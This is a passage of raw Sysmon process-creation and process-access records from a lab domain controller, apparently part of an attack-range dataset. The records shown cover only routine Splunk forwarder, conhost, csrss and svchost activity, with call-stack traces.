Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:46.066{59A5CD1D-9092-6005-1E01-00000000A301}4656C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:47.362{59A5CD1D-9093-6005-1F01-00000000A301}49284924C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:47.221{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9093-6005-1F01-00000000A301}4928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:47.221{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:47.221{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:47.221{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:47.221{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:47.221{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:47.221{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:47.221{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:47.221{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:47.221{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:47.221{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9093-6005-1F01-00000000A301}4928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:47.221{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9093-6005-1F01-00000000A301}4928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:47.222{59A5CD1D-9093-6005-1F01-00000000A301}4928C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.862{59A5CD1D-9094-6005-2101-00000000A301}50324812C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005176Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.721{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9094-6005-2101-00000000A301}5032C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005175Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.721{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005174Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.721{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005173Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.721{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005172Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.721{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.721{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.721{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.721{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.721{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:43:48.721{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 